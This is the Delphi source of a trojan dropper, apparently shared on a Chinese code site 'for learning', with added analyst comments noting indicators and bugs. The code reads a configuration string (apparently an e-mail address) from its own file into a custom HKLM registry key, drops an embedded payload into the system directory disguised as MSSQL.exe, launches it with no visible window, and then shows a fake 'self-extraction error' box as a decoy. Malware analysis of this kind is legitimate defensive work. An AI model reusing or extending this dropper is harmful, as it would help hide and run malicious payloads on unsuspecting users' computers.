baseexe.dpr

来自「一个木马的源程序。希望大家可以一起通过它来学习一此东西」· DPR 代码 · 共 80 行

program BaseExe;

uses
  Windows,
  Messages,
  SysUtils,
  Classes,
  Registry,
  TLHelp32;

{$R ico.res}
{$R msexe.res}
// DllResToFile: copies a resource embedded in this executable out to a file on disk.
//   ResName  - name of the resource to load from the current module (HInstance)
//   ResType  - resource type string, handed to the resource API as a PChar
//   FileName - path the resource bytes are written to
// Analyst note: this is the routine the sample uses to drop its embedded payload;
// the only call visible in this file extracts resource 'SRC1' of type 'F1' to
// <system directory>\MSSQL.exe. Which .res file supplies that resource is not shown
// here (presumably msexe.res, linked via {$R} above -- confirm by listing resources).
// NOTE(review): Res.Free is not protected by try/finally, so an exception raised by
// SaveToFile skips the Free call and the stream object is leaked.
procedure DllResToFile(const ResName, ResType,FileName: string);
var
Res: TResourceStream;
begin
Res := TResourceStream.Create(HInstance,ResName, PChar(ResType));
Res.SaveToFile(FileName); // save the resource to a file, i.e. restore the embedded file
Res.Free;
end;

// SetEmail: reads a configuration string appended to the end of this executable's own
// file (an overlay) and stores it in the registry.
//
// Overlay layout as read by the code below, counted from the end of the file:
//   [ L bytes of string data ][ emailSize : Integer ]
// where emailSize is the total trailer length (data + the size field itself) and
// L = emailSize - SizeOf(emailSize).
//
// Registry writes (useful as host-based indicators when triaging this sample):
//   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\msmt
//     'em'    = the string recovered from the overlay (presumably an e-mail address,
//               judging by the procedure and variable names -- confirm on a sample)
//     'count' = '0'
// The 'msmt' subkey does not appear to be a stock Windows key; OpenKey is called with
// CanCreate=True, so the code asks for it to be created if absent.
//
// NOTE(review): emailSize is taken from the file without any validation; a missing or
// malformed trailer yields an arbitrary value that is then used for Seek and SetLength.
// NOTE(review): the 'try' is entered before Source is assigned, so if
// TFileStream.Create raises, the 'finally' calls Free on an uninitialised variable.
// NOTE(review): the local 'em' is declared but never used; the result of OpenKey is
// not checked.
procedure SetEmail;
var
Myreg:Tregistry;
Source:TFileStream;
emailSize:integer;
arrstr:array of char;
RegStr,regkey,em:String;
i,L:integer;
begin
regkey:='\Software\Microsoft\Windows\CurrentVersion\msmt';
try
    // Open the running executable itself (ParamStr(0)) read-only, without locking out
    // other readers or writers.
    Source:=TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone) ;
    // The last SizeOf(Integer) bytes of the file hold the trailer length.
    Source.Seek(-Sizeof(emailSize) ,soFromEnd);
    Source.Read(emailSize,Sizeof(emailSize));
    // Jump back to the start of the trailer and read everything except the size field.
    Source.Seek(-emailSize,soFromEnd);
    L:=emailSize-Sizeof(emailSize);
    setlength(arrstr,L);
    // Reads L bytes into an array of L chars; assumes a 1-byte Char
    // (pre-Unicode Delphi) -- TODO confirm compiler version.
    Source.Read(arrstr[0],L);
    // Build the string one character at a time from the buffer.
    for i:=0 to L-1 do begin
      RegStr:=RegStr+arrstr[i];
    end;
  finally
    Source.Free;
  end;
  Myreg:=Tregistry.Create;
  Try
    // Machine-wide hive: presumably needs administrative rights to write -- the code
    // makes no attempt to handle a failure here.
    Myreg.RootKey:=HKEY_LOCAL_MACHINE;
    Myreg.OpenKey(regkey,True);
    Myreg.WriteString('em',RegStr);
    Myreg.Writestring('count','0');
  finally
   Myreg.free;
  end;
end;
// Getsyspath: returns the Windows system directory as a Delphi string, using
// GetSystemDirectory with a temporary heap buffer.
// Returns: the path as reported by the API, converted with StrPas.
// NOTE(review): the buffer size is fixed at 255 and the return value of
// GetSystemDirectory is not checked, so a failed or truncated call is not detected
// and StrPas would then read whatever the uninitialised buffer contains.
Function Getsyspath:string;
var
  TmppathP:pchar;
  MaxBuf:Dword;
begin
  MaxBuf:=255;
  Getmem(tmppathP,MaxBuf);
  GetSystemDirectory(tmppathp,MaxBuf);
  // Copy the null-terminated result into a managed string before releasing the buffer.
  Result:=strpas(tmppathp);
  FreeMem(tmppathP);
end;

// Program entry point. Sequence, as written below:
//   1. Build the target path <system directory>\MSSQL.exe.
//   2. Call SetEmail, which copies the overlay configuration into the registry
//      (this happens on every run, so the 'count' value is reset to '0' each time).
//   3. If the target file does not exist yet, extract resource 'SRC1' (type 'F1') to it.
//   4. Start the target with WinExec and SW_HIDE, i.e. with no visible window.
//   5. Show an error-style message box. The text reads "An error occurred during
//      self-extraction!" with the title "Error"; it is displayed unconditionally,
//      regardless of whether the earlier steps succeeded, so it functions as a decoy
//      for the user rather than as real error reporting.
//
// Analyst note -- behaviours visible here that are worth alerting on:
//   * a user-launched program creating MSSQL.exe directly inside the system directory;
//   * that file being started hidden by the same process immediately afterwards;
//   * the registry values written by SetEmail under
//     HKLM\Software\Microsoft\Windows\CurrentVersion\msmt.
// NOTE(review): the WinExec return value is ignored, so a failed launch is not noticed.
var
syspath:String;
exefile:String;
begin
syspath:=Getsyspath;
exefile:=syspath+'\MSSQL.exe';
SetEmail;
// Drop the embedded file only once; an existing file at this path is reused as-is.
if not fileexists(exefile) then
DllResToFile('SRC1', 'F1',exefile);
winexec(Pchar(exefile),SW_HIDE);
MessageBox(0, '自解压时发生错误!','错误', MB_OK+MB_ICONERROR);
end.
